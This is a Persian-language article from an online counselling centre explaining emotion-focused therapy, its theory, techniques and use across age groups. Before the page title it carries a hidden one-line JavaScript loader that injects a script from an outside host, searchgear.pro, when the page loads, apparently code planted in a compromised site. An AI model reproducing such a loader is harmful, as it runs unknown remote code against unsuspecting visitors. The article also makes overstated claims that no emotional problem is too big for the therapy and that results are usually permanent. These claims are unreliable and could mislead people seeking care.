;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); روان درمانی متمرکز بر هیجان (EFT) چیست؟ | مرکز مشاوره آنلاین روان‌یاری
EFT چیست؟

روان درمانی متمرکز بر هیجان (EFT) چیست؟

میزان پیشرفت خواندن شما

فهرست مطالب
مقدمه

درمان متمرکز بر هیجان، از جهات مختلف با روش های سنتی درمان مشکلات عاطفی متفاوت است. این روش کوتاه مدت بوده و بر تفسیر رفتارهای ما بر اساس احساسات، تمرکز دارد. تصور می شود که احساسات ما اساس تصمیم گیری و ترجیحات شخصی ما هستند، بنابراین استدلال می شود که همه احساسات باید در فرآیندهای ذهنی تفسیر، پردازش و درونی شوند. در غیر این صورت، احساسات نادیده گرفته شده به فرد آسیب می رسانند. در درمان متمرکز بر هیجان، فرد بیمار به عنوان تجربه‌کننده احساسات، نقش فعالی در درمان دارد.

هدف درمان متمرکز بر هیجان، آشکارسازی احساسات پنهان و در نتیجه حل مشکلات روانی است. کنترل خشم با روش تنظیم هیجانات از اهداف اصلی درمان می باشد.

نظریه EFT

احساسات بدون شک یکی از مهم ترین عوامل موثر بر تصمیم گیری ها و انتخاب های زندگی هستند. نظریه EFT معتقد است که احساسات مختلفی که نمی توانند به موقع در کل فرآیند زندگی از کودکی تا بزرگسالی ابراز شوند، به خود فرد آسیب می رسانند. در نتیجه درک، ابراز یا انعکاس این احساسات با روش درمانی متمرکز بر هیجان ضرورت دارد.

نظریه درمان متمرکز بر هیجان

می توان این گونه بیان کرد که هر فردی حول یک طرحواره عاطفی خاص متولد و بزرگ شده است. مشخص است که این طرحواره های عاطفی در زندگی هر فرد، زمانی خود را نشان می دهند که فرد تاثیر هیجانات خود را به شکل فیزیکی تجربه کند.   

نظریه EFT

اهداف درمان متمرکز بر هیجان EFT چیست؟

درمان هیجان محور چیست؟ ضمن پاسخ به این سوال، اهداف درمان را می توان در همین زمینه ارزیابی کرد. هدف اصلی درمان متمرکز بر هیجان، حل مشکلات روحی و روانی با هیجان درمانی مناسب است. به عنوان مثال با EFT، فرد به وضعیت تعادل رسیده و می تواند خشم خود را کنترل کند. این وضعیت متعادل با به نمایش گذاشتن احساسات فراهم می شود.

تکنیک های درمانی متمرکز بر هیجان در درک و کنترل احساساتی که نقش مهمی در زندگی ما دارند، بسیار مفید هستند. از این حیث ممکن است هر فردی در مقطعی از زندگی خود نتواند احساسات خود را به درستی ابراز کند. درمان متمرکز بر هیجان در رفع حالات مختلف احساسی نقش مهمی دارد.

تکنیک های درمان هیجان محور چیست؟

هدف کلی تکنیک های درمان متمرکز بر هیجان، دستیابی به احساسات عمیق است. در واقع از این طریق، آگاهی عاطفی و ابراز احساسات افزایش پیدا می کند. علاوه بر این، در طول این تکنیک‌ها، اغلب روش رهاسازی انجام می شود.

روش رهاسازی به این صورت است که فرد در طی آن، هیجانی که باعث آسیب شده است را کنار می گذارد و رها می کند. در واقع، درمان EFT، عمدتاً با درمان وجودی، درمان تجربی و درمان فردمحور سروکار دارد. به همین دلیل، کاربرد بیش از یک تکنیک و در نتیجه بازسازی احساسات بخشی از روال درمان می باشد.

روان درمانی متمرکز بر هیجان چیست؟

درمان متمرکز بر هیجان یکی از رویکردهای روان درمانی متفاوت است که هدف آن آشکارسازی و رفع احساسات ناخوشایند فرد می باشد. علاوه بر این، فرآیند روان درمانی متمرکز بر هیجان، آن را از سایر روش های درمانی متمایز می کند.

  به روانشناس چه بگوییم؟

در این نوع درمان، فرآیندهای دلبستگی، که شامل مسائلی مثل درک عواطف و ایجاد همدلی، کشف پیوند بین مراجع و درمانگر، و بازسازی عاطفی هستند، مورد بحث قرار می گیرند.

در طول درمان، هدف اصلی ارائه پیشنهاد یا توصیه به فرد بیمار نیست، بلکه کمک به مراجعه کننده برای درک احساسات است. این تکنیک ها به فرد کمک می کنند تا نسبت به احساسات خود درک بیشتری داشته باشد و از آن ها آگاه باشد.

نظریه درمان متمرکز بر هیجان

مزایای بهره مندی از نظریه EFT چیست؟

نظریه EFT استدلال می کند که روابط بین فرد و مشکلات عاطفی را می توان با درمان کوتاه مدت تغییر داد. تحقیقات نشان می دهد که EFT بسیار موثر است و اکثر افرادی که از آن استفاده می کنند، شانس خوبی برای بهبود دارند. برای آشنایی با پنج مزیت EFT، به علاوه نقاط قوت و ضعف درمان، ادامه مطلب را بخوانید.

نظریه EFT و سلامت

طبق نظریه EFT، بیشتر مشکلات روانی یا عمومی که افراد از آن رنج می برند، به دلیل اجتناب از احساسات و امتناع از پذیرش مشکلات است. در نتیجه این موضوع در فرد، منجر به نیازهای عاطفی برآورده نشده می شود.

EFT به افراد کمک می کند به جای سرکوب یا اجتناب از احساسات ناخوشایند، با آن ها مقابله کنند. این نوع درمان نه تنها احساسات فرد را تحت تاثیر قرار می دهد، بلکه بر روی سلامت جسمانی و فیزیکی بدن نیز تاثیرگذار است.

یکی از جنبه‌های مثبت این درمان این است که می‌تواند روی هر فردی و تقریباً هر موضوع احساسی مؤثر باشد. هیچ مشکلی برای EFT خیلی بزرگ یا خیلی عمیق نیست. نتایج درمان نیز در مدت زمان کوتاهی رخ می دهند و معمولاً دائمی هستند.

درمان متمرکز بر هیجان چگونه در مورد کودکان و نوجوانان اعمال می شود؟

درمان EFT به عنوان یکی از ارزشمندترین روش های حمایت روانشناختی در تمام سنین و فرآیندها استفاده می شود. در کودکان و نوجوانان، ممکن است مشکلاتی در ابراز وجود رخ دهد. در این حالت استفاده از تکنیک رهاسازی می تواند کارایی قابل توجهی داشته باشد.

به لطف درمان متمرکز بر هیجان، کودکان و نوجوانان می توانند احساسات خود را راحت تر بیان کنند و در همه فرآیندها خلق و خوی سالمی داشته باشند. درمان متمرکز بر هیجان در کودکان و نوجوانان مانند بزرگسالان از طریق گفتگو و ارتباط انجام می شود.

نظریه EFT چیست؟

درمان متمرکز بر احساسات چگونه در بارداری اعمال می شود؟

تغییرات عاطفی در دوران بارداری مانند هر دوره از زندگی ادامه دارد. با توجه به تغییرات روانشناسی و شرایط هورمونی دوران بارداری، درک و آشکار کردن احساسات خود برای افراد اهمیت بیشتری پیدا می کند.

به منظور حمایت از رشد سالم مادر و نوزاد، می توان از روش درمان متمرکز بر هیجان استفاده کرد. درمان متمرکز بر هیجان برای درک احساسات ابراز نشده مورد استفاده قرار می گیرد و توسط روانشناسان متخصص در این زمینه در دوران بارداری اعمال می شود.

درمان متمرکز بر هیجان چگونه در مورد سالمندان اعمال می شود؟

فرآیندهای عاطفی عناصر ناپایداری هستند که در تمام سنین تغییر می کنند یا گسترش می یابند. درمان متمرکز بر هیجان یکی از روش هایی است که اغلب برای سالمندان به کار می رود تا اطمینان حاصل شود که احساسات پشت رفتار و افکار فرد به وضوح درک شده و به روشی سالم ادامه می یابد.

  یک روانشناس خوب چه ویژگی هایی دارد؟

ارتباط متقابل و رسیدن به هسته احساسات در درمان متمرکز بر هیجان ضروری است. در دوران سالمندی، تجربه زندگی افراد بسیار بالاست و می توان با بهره مندی از درمان در مرحله درک عواطف، به زندگی کامل تری دست یافت.

اگرچه تکنیک‌های درمانی متمرکز بر هیجان متفاوت هستند، اما انتخاب آن ها با توجه به نظر متخصص و نیازهای فرد انجام می شود. همچنین اگرچه تکنیک های درمان هیجان محور متفاوت هستند، اما ماهیت این درمان، ارتباط متقابل و همدلی می باشد.

جمع بندی

نظریه EFT بر روی شناخت احساسات و عواطف فرد متمرکز است. این نظریه این گونه بیان می کند که بروز ندادن احساسات، باعث به وجود آمدن مشکلات عاطفی در افراد می شود. به عنوان مثال عدم کنترل خشم از جمله پیامدهای ابراز نکردن احساسات است. هر فردی در برهه های مختلف زندگی نیاز به درک شدن عواطف و احساسات دارد. بنابراین باید شیوه ابراز احساسات را به خوبی بیاموزد و بر هیجانات خود متمرکز شود.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.